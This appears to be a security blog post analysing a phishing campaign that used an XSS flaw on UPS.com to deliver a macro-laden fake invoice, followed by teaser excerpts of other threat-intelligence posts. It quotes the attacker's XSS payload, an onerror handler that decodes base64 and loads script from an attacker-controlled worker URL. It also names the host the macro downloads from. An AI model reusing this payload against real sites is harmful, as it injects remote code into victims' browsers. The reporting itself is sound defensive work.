UPS XSS Vulnerability Used in Sophisticated Phishing Attacks

-

Recent reports have indicated fraudsters leveraging a XSS vulnerabilities on UPS.com to issue fake UP Invoice Microsoft Word docs. UPS, for the very few who are not familiar, is the United Parcel Service and a popular American shipping and receiving, supply-chain management company.


Researcher Daniel Gallagher first encountered the scam pretending to be an email from UPS claiming that a package had an "exception" and needed to be picked up by the customer. The threat actor uses a XSS vulnerability in UPS.com to modify the regular look of the website to make it appear like a legit download page. This vulnerability allows the fraudster to push a malicious doc through a remote Cloudflare worker but it comes it looking like it came from UPS.com.


The email, itself, contains multiple legitimate links that likely serve only to legitimize the email. The tracking number, however, is a link to the UPS site that contains the exploit for an XSS vulnerability that will inject JavaScript into the browser once the page is opened.



The phishing URL:


The base64 encoded string seen in the middle of this URL contains a comment from the fraudster, essentially explaining that the URL needed to be longer in order to hide the XSS exploit query parameter at the end. It translates to the following:

1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;)


The comment could be a nod to security researchers that the fraudster accurately predicted would analyze the phishing URL.


The second string contains the JavaScript exploit injected into UPS.com when a user accesses the page:

img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

The base64 string in the atob() function contains the URL mentioned to a Cloudflare worker script the vulnerability loads up:

$.getScript('https://m.media-amazon.workers.dev/js')

Discovered by Gallagher on Urlscan, the Cloudflare worker script will make the UPS page display a message that a file is downloading:


This page is ultimately where the malicious document is downloaded to the victim's machine.


The document downloaded is titled "invoice_1Z7301XR1412220178" and appears to be a shipping invoice from UPS. once opened, the document will be unreadable and will prompt the user to "Enable Content" to view it. Once enabled, the macros embedded into the file will download a "blackhole.png" file from "https://divine-bar-3d75.visual-candy.workers.dev".


The phishing attack is of obvious sophistication and creativity. The threat actor removes a great deal of suspicion from the entire process by leveraging the legitimate UPS.com website and a properly obfuscated and hidden URL. While this type of activity may seem obvious to security professionals and researchers, that's not who this is targeting and Joe Schmo in logistics may see this email as completely legitimate.

This is a proper example of sophisticated phishing.

Relevant articles:
https://cisomag.eccouncil.org/xss-vulnerability-in-ups/
https://www.bleepingcomputer.com/news/security/phishing-campaign-uses-upscom-xss-vuln-to-distribute-malware/


Comments

Post a Comment

Popular posts from this blog

-
Image
ESET's APT Activity Report Q4 2023-Q1 2024 summarizes observations of various advanced persistent threat (APT) groups documented by ESET researchers between October 2023 and March 2024. Their observations highlight the broader threat landscape investigated during this period of time and details trends, developments and tooling used by these threat actors. The public report proclaims to contain a fraction of what private ESET customers receive. China Chinese-aligned cyber espionage groups have traditionally targeted public facing applications for obtaining initial access on a target network. In many campaigns investigated by ESET and others, the groups leveraged one-day vulnerabilities against a range of appliances and software including VPNs, firewalls, Confluence, Exchange, and others. See ESETs report linked below for their detailed analysis on Chinese threat activity.  Middle East According to ESET's research, a potentially Iranian-aligned threat group BladedFeline continued...
Read more

Russian GRU Unit 29155 recent operations

-
Image
Background Russian GRU military intelligence Unit 29155 (aka Cadet Blizzard, Ember Bear, FrozenVista, UNC2589) is a covert subunit of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), primarily tasked with conducting high-stakes and clandestine operations abroad. Established under the GRU, Unit 29155 gained public attention due to its involvement in activities that align with Russia's asymmetric warfare objectives, particularly in Europe, Ukraine, and NATO-affiliated regions. Unit 29155 operates in several domains, from traditional espionage and sabotage to cyber operations. Figure 1 WANTED: GRU Unit 29155 [1] Unit 29155 has significantly intensified operations since 2020, pivoting from covert actions in Europe toward a greater emphasis on cyber operations with a focus on undermining Ukraine and NATO allies through espionage, data manipulation, and sabotage. Primary TTPs Espionage and Data Theft Unit 29155 conducts extensive espionage ca...
Read more
-
Image
Microsoft recently released their findings after a lengthy investigation into activity conducted by the Russian state-sponsored APT28 group using a unique tool for privilege escalation and credential harvesting on victim networks. Microsoft refers to the custom tool as GooseEgg and claim that the group has been observed leveraging this tool since at least June 2020. GooseEgg The custom toolset leverages CVE-2023-38208 in the Windows Print Spooler service which changes a JavaScript constraints file and executes it with SYSTEM permissions. Based on their findings, Microsoft believes GooseEgg is deployed after initial access to elevate access to targeted systems with the end goal of harvesting credentials and data. Unsurprisingly, targeting includes Ukrainian, Western European and North American entities across several sectors including government, non-government, education and transportation. After initial access of victim device, researchers observed APT28 deploying GooseEgg to escalate...
Read more